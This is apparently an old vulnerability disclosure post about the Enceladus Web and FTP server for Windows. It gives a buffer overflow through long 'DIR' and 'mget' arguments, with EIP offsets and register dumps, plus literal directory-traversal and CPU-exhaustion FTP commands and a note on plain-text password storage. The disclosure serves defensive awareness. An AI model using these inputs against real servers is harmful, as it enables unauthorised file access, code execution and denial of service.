The Enceladus Web and FTP server suite for Windows below v3.9.11 contains a buffer overflow which allows remote command execution. More information available http://www.mollensoft.com.
bc56ff8f7fcff42ba61b72dc3e45978976994ff033fe3cee6516d6863ba75f6e
hi
Enceladus Server Suite is an Internet/Intranet lightweight
Web and
FTP Server for
Windows, the version 3.9.11 according to
mollensoft "Includes a fix to
the directory traversal vulnerability... ( This is a
CRITICAL
SECURITY UPDATE)"
http://www.mollensoft.com/
I found several vulnerability critical concerning this
server
1-buffer overflow and remote code execution:
tamer notified that the waiter crashait with "long sequence
of
characters as an argument to "CD" command"
(http://online.securityfocus.com/archive/1/302596)..I
believe that
it passed dimensioned of a true buffer overflow because
this crash
allows only a overwrite ' ESP and thusune simple attaque DOS
50e091e3 803820 cmp byte ptr [eax],0x20
(ftpservx.dll)
with argument "DIR" we can overwrite eip
dir+[buffer =279byte] >> eip is overwritet at:42,43,44,45
sufficient for the injection of a shellcode
the state of the registers is:
Access violation - code c0000005 (first chance)
eax=0012bcb8 ebx=0012c574 ecx=61616161 edx=7846f5b5
esi=0012bce0
edi=0019affd
eip=61616161 esp=0012bc20 ebp=0012bc40 iopl=0 nv up ei pl
zr na po nc
cs=001b ss=0023 ds=0023 es=0023 fs=003b gs=0000
efl=00000246
61616161 ?? ???
it is noticed whereas the eip is at the beginning of our
buffer
ftp> dir aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa
[EIP=4BYTE]
aaaaaaaaaaaaaaaaaaaaaaaaaa
aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa
aaaaaaaa
aaaaaaaaaaaa
aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa
aaaaaaaa
aaaaaaaaaaaa
aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa
the argument "mget" gives also the same result
the exploit is simple of realization since ebx point
towards our
buffer
0012c274 61 61 61 61 61 61 61 61 61 61 61 61 61 61 61 61
2- directory traversal
ftp>cd ..
access denied
ftp>cd cd @/....\
250 CWD command successful.
ftp> dir
200 PORT command successful
150 Opening ASCII mode data connection for /bin/ls.
drwxr-xr-x 1 User Group 0 Dec 18 12:59 anonymous-
ftp
drwxr-xr-x 1 User Group 0 Dec 18 12:59 downloads
-rwxr-xr-x 1 User Group 8544 Mar 18 02:09
emailme.html
-rwxr-xr-x 1 User Group 878 Mar 16 04:52
execupload.html
-rwxr-xr-x 1 User Group 1033 Oct 27 02:22
exitstatus.html
-rwxr-xr-x 1 User Group 5965 Mar 18 02:12
fileuplogin.html
drwxr-xr-x 1 User Group 0 Dec 18 12:59 ftproot
drwxr-xr-x 1 User Group 0 Dec 18 12:59 images
-rwxr-xr-x 1 User Group 6783 Mar 18 02:11 index.html
-rwxr-xr-x 1 User Group 4465 Mar 18 02:09 Links.html
-rwxr-xr-x 1 User Group 1299 Mar 18 23:41
mailexitstatus.html
-rwxr-xr-x 1 User Group 4402 Mar 18 02:09
MyPictures.html
drwxr-xr-x 1 User Group 0 Dec 18 12:59 secure-
downloads
-rwxr-xr-x 1 User Group 5082 Mar 18 02:09
signguestbook.html
-rwxr-xr-x 1 User Group 5188 Mar 18 02:09 upload.html
ftp> cd @@@@@@@@@@@/..c:\
250 CWD command successful.
ftp> dir
200 PORT command successful
150 Opening ASCII mode data connection for /bin/ls.
226 Listing complete.
ftp> pwd
257 "c:/" is current directory.
ftp> dir
[NO COMMENT]
3-denial of service and consume cpu
ftp> cd @/..@/..
(no reponse)
cpu 99% used
4-the password is stored plain text in /user/"login"
securma massine
_________________________________________________________
Gagne une PS2 ! Envoie un SMS avec le code PS au 61166
(0,35 Hors coût du SMS)